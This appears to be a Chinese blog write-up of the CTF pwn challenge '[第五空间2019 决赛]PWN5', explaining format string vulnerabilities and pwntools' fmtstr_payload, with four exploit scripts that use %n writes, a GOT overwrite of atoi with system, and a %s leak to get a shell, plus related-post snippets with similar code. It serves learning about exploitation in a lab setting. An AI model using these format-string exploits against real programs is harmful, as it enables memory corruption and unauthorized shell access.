[第五空间2019 决赛]PWN5

已于 2022-09-13 23:16:42 修改
阅读量452 收藏 1
点赞数 1
文章标签: php 开发语言 安全
于 2022-09-13 19:31:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63253040/article/details/126839618
版权

格式化字符串漏洞学习记录

CTF pwn题之格式化字符串漏洞详解___lifanxin的博客-优快云博客_pwn 格式化字符串漏洞

printf/sprintf/snprintf等格式化打印函数都是接受可变参数的,而一旦程序编写不规范,比如正确的写法是:printf("%s", pad),写成了:printf(pad),此时就存在格式化字符串漏洞。

利用payload来寻找输入字符串到栈顶指针的偏移

aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p

栈是一种特殊的线性表,是一种只允许在表的一端进行插入删除操作的线性表。表中允许进行插入、删除操作的一端称为栈顶。表的另一端称为栈底。栈顶的当前位置是动态的,对栈顶当前位置的标记称为栈顶指针。当栈中没有数据元素时,称之为空栈。栈的插入操作通常称为进栈或入栈,栈的删除操作通常称为退栈或出栈。

%s 打印地址内容
%n 写四字节

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

offset:格式化字符串的偏移;

writes:需要利用%n写入的数据,采用字典形式,就写成{目标地址: 要写入的数据};要将printf的GOT数据改为system函数地址,就写成{printfGOT: systemAddress}

numbwritten:已经输出的字符个数,这里没有,为0,采用默认值即可;#这里是要考虑printf参数的原因

write_size:写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload

exp1:

from pwn import *

p=process('./pwn')


dword_804c044=0x0804C044
payload=fmtstr_payload(10,{dword_804c044:4})

p.sendlineafter("your name:",payload)
p.sendlineafter("your passwd",str(4))
p.interactive()

exp2:

from pwn import *

p = process("./pwn")

elf=ELF('./pwn')
atoi_got=elf.got['atoi']
system_plt=elf.plt['system']

payload=fmtstr_payload(10,{atoi_got:system_plt})

p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

exp3:

from pwn import *

p=process('./pwn')
dword_addr=0x804C044
p.recvuntil('your name:')
payload=p32(dword_addr)+b'%10$n'
p.sendline(payload)
p.recvuntil("your passwd:")
p.sendline(b'4')
p.interactive()

exp4:

from pwn import *

p=process('./pwn')

dword_addr=0x804C044
payload=p32(dword_addr)+b'%10$s'
p.sendline(payload)
p.recvuntil("Hello,")
p.recv(4)
number=u32(p.recv(4))
p.sendline(str(number))
p.interactive()

[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 523
[buuctf][第五空间2019 决赛]PWN5
BUU:[第五空间2019 决赛]PWN5
最新发布
2401_88012221的博客
03-01 960
如果用户输入中包含格式说明符(如%x、%n等,可以通过%x泄露栈上的数据,或者用%n写入内存,修改某些关键变量,比如dword_804C044的值,或者在栈上覆盖返回地址),可能导致内存泄露或覆盖内存地址,这是常见的安全漏洞点。//这里读取最多0xF(15)字节到nptr中,然后使用atoi(nptr)将其转换为整数,并与之前从urandom读取的dword_804C044比较。第7行:p32(0x0804C044)占用了4个字节,所以此时输出的字符数为4(也就是要输入的密码是4)。srand(v1);
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1006
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4858
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 537
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1807
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
第五空间2019_决赛_PWN5
z1r0的博客
12-04 282
第五空间2019_决赛_PWN5 查看保护 开了canary和NX 23行有一个格式化字符串漏洞,测出偏移为10,32位程序的话直接用pwntools的工具fmtstr_payload,没有开pie,所以将unk_804c044这里给覆盖成自己想要的值,然后输入password就可以get_shell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug =
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1315
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 472
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 491
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 295
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 1061
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值